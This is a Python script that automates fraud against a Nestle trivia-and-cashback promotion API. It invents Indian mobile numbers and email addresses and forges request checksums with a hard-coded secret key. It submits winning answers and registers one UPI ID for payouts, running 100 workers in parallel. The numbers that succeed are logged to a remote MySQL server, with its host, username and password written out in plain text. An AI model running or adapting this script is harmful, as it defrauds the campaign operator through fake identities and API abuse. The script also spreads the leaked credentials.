import requests
import json
import hashlib
import random
import mysql.connector
from multiprocessing import Pool

# Simulating $_POST['upi']
upi = "nirajmto5@airtel"  # Replace this with dynamic input if needed

f = ["Vasu", "Nirmal", "Akshay", "Chander", "Rupinder", "Akhil", "Shanti", "Ravi", "Kunal", "Chandrakant",
     "Sulabha", "Mahinder", "Swapnil", "Deepa", "Sulabha", "Neelima", "Vijaya", "Nikhil", "Isha", "Siddhi",
     "Ajeet", "Kshitija", "Anila", "Jitender", "Sumeet", "Preethi", "Priti", "Gayathri", "Dhaval", "Mukesh",
     "Lalita", "Rachana", "Rakhi", "Harshal", "Shekhar", "Rajiv", "Balakrishna", "Ajeet", "Tara", "Chander",
     "Deepa", "Prabhu", "Rajendra", "Jeetendra", "Nandu", "Aniket", "Sumati", "Prabhu", "Vimal", "Indira",
     "Laxman", "Agni", "Kapil", "Kailash", "Puneet", "Pratik", "Pankaj", "Ishore", "Swati", "Rupa",
     "Hardeep", "Prabhu", "Khushi", "Gurmeet", "Nishant", "Rishi", "Naveen"]

# Functions (same as before)
def generate_indian_mobile_number():
    first_digit = str(random.choice([6, 7, 8, 9]))
    remaining_digits = str(random.randint(100000000, 999999999))
    return first_digit + remaining_digits

def sha256(data):
    return hashlib.sha256(data.encode()).hexdigest()

def sort_json_body(json_str):
    try:
        data = json.loads(json_str)
        sorted_data = dict(sorted(data.items(), reverse=True))
        return json.dumps(sorted_data, separators=(',', ':'))
    except Exception:
        return ""

def generate_checksum(data, hashkey):
    secret_hash = sha256(hashkey)
    sorted_body = sort_json_body(data)
    checksum_input = f"{secret_hash}{sorted_body}" if sorted_body not in ["", "{}"] else secret_hash
    return sha256(checksum_input)

hashkey = "*dkaSDs#*k9487ld!*kaSJDsj9784@ADS@197dsk!!dHD@dka267#SD!sk192@"
headers_common = {
    "Content-Type": "application/json",
    "Accept": "application/json",
    "campaignId": "100778999",
    "clientId": "nwHM0EqOVH6c/5J7SZ0w36EXMBoGMIlaXTeL4qN63KE=",
    "appVersion": "1.0",
    "appName": "asknestle",
    "channel": "WEB",
    "User-Agent": "Mozilla/5.0 (Linux; Android 14; RMX3870 Build/UKQ1.230924.001) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.122 Mobile Safari/537.36"
}

def execute_task(_):
    try:
        # Randomly generate data
        fname = random.choice(f)
        email = f"{fname}{random.randint(1000, 9000)}@gmail.com"
        num = generate_indian_mobile_number()

        # Step 1: Save User Detail
        url = "https://web.myfidelity.in/api/v1/nestle-asknestle/save-user-detail"
        data = json.dumps({
            "msisdn": num,
            "firstName": fname,
            "lastName": "",
            "emailId": email,
            "howOldIsYourKid": "Between 2-6 Years Old",
            "state": "Delhi",
            "consent1": True,
            "consent2": True,
            "isLoginAllowed": False,
            "ssoId": "NA"
        })
        checksum = generate_checksum(data, hashkey)
        headers = headers_common.copy()
        headers.update({"checksum": checksum, "msisdn": num})
        response = requests.post(url, data=data, headers=headers)

        if response.status_code != 200:
            print(f"Error in Step 1: {response.status_code}")
            return

        # Step 2: Submit Trivia Answers
        url = "https://web.myfidelity.in/api/v1/nestle-asknestle/save-answers"
        data = json.dumps({
            "msisdn": num,
            "answersMap": {
                "trivia1": {"answer": "Carbohydrate", "question": "Which nutrient is the major source of energy for the body?", "isCorrect": True},
                "trivia2": {"answer": "It has nutrients for good gut health", "question": "This is a benefit of eating curd?", "isCorrect": True},
                "trivia3": {"answer": "2000 kcal", "question": "What is the average energy requirement for an adult per day?", "isCorrect": True},
                "trivia4": {"answer": "Milk & milk products", "question": "Fiber rich food does not include?", "isCorrect": True},
                "trivia5": {"answer": "Guava", "question": "Which among these is NOT a good source of vitamin A?", "isCorrect": True}
            }
        })
        checksum = generate_checksum(data, hashkey)
        headers.update({"checksum": checksum})
        response = requests.post(url, data=data, headers=headers)
        url = "https://web.myfidelity.in/api/v1/nestle-asknestle/congratulation"
        print(requests.post(url, data=data, headers=headers))
        

        if response.status_code != 200:
            print(f"Error in Step 2: {response.status_code}")
            return

        # Step 3: Save UPI Info
        url = "https://web.myfidelity.in/api/v1/nestle-asknestle/save-upi-info"
        data = json.dumps({"vpa": upi})
        checksum = generate_checksum(data, hashkey)
        headers.update({"checksum": checksum})
        response = requests.post(url, data=data, headers=headers)
        result = response.json()
        print(result)

        if result.get("status") != "SUCCESS":
            print(f"Error in Step 3: {response.status_code}")
            return
        else:
            # DB Insert
            try:
                conn = mysql.connector.connect(
                    host="136.243.92.92",
                    user="freefok2_nestle",
                    password="Niraj1209!",
                    database="freefok2_nestle"
                )
                cursor = conn.cursor()
                cursor.execute("INSERT INTO nestle (number) VALUES (%s)", (num,))
                conn.commit()
                print("Connected and inserted successfully.")
                cursor.close()
                conn.close()
            except mysql.connector.Error as err:
                print(f"Database error: {err}")

        # Step 4: Redemption if status is SUCCESS
        #if result.get("status") == "SUCCESS":
            #url = "https://web.myfidelity.in/api/v1/nestle-asknestle/redemption"
           # data = json.dumps({"redemptionType": "CASHBACK"})
           # checksum = generate_checksum(data, hashkey)
          #  headers.update({"checksum": checksum})
           # response = requests.post(url, data=data, headers=headers)
          #  print(response.json())
      #  else:
           # print("Redemption not successful.")

    except Exception as e:
        print(f"Error during task execution: {e}")

if __name__ == '__main__':
    # Create a Pool of worker processes (using 4 cores for example)
     with Pool(100) as pool:
         pool.map(execute_task, range(100))  # Execute the task 10,000 times/
   # execute_task()
